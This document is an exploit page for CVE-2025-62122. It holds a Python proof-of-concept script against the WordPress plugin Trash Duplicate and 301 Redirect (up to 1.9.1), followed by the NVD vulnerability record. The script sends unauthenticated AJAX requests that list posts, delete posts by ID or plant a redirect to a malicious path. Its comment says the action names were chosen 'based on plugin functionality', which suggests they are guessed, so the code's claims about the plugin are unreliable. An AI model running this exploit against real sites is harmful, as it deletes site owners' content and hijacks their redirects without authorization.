CVE-2025-62122

import requests import sys # CVE-2025-62122 PoC - Broken Access Control in Trash Duplicate and 301 Redirect plugin # Target: WordPress site with Trash Duplicate and 301 Redirect plugin <= 1.9.1 def exploit(target_url, action='get_duplicate_posts'): """ Exploit missing authorization vulnerability Actions: get_duplicate_posts, delete_duplicates, manage_redirects """ target = target_url.rstrip('/') # Common WordPress AJAX endpoint ajax_url = f"{target}/wp-admin/admin-ajax.php" # Define vulnerable actions based on plugin functionality actions = { 'get_duplicate_posts': { 'action': 'tdr_get_duplicate_posts', 'data': {} }, 'delete_duplicates': { 'action': 'tdr_delete_duplicates', 'data': {'post_ids': [1, 2, 3]} # Target post IDs }, 'manage_redirects': { 'action': 'tdr_save_redirect', 'data': {'old_url': '/old-page', 'new_url': '/malicious-site'} } } if action not in actions: print(f"[-] Unknown action: {action}") return False payload = { 'action': actions[action]['action'], **actions[action]['data'] } print(f"[*] Exploiting: {action}") print(f"[*] Target: {ajax_url}") try: # Send request without authentication response = requests.post(ajax_url, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Request successful - Access Control bypassed!") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [action]") print(f"Actions: get_duplicate_posts, delete_duplicates, manage_redirects") sys.exit(1) target_url = sys.argv[1] action = sys.argv[2] if len(sys.argv) > 2 else 'get_duplicate_posts' exploit(target_url, action)

{"cve": {"id": "CVE-2025-62122", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:45.010", "lastModified": "2026-04-23T15:34:34.977", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in solwininfotech Trash Duplicate and 301 Redirect trash-duplicate-and-301-redirect allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Trash Duplicate and 301 Redirect: from n/a through <= 1.9.1."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en Solwininfotech Trash Duplicate y 301 Redirect permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Trash Duplicate y 301 Redirect: desde n/a hasta 1.9.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/trash-duplicate-and-301-redirect/vulnerability/wordpress-trash-duplicate-and-301-redirect-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}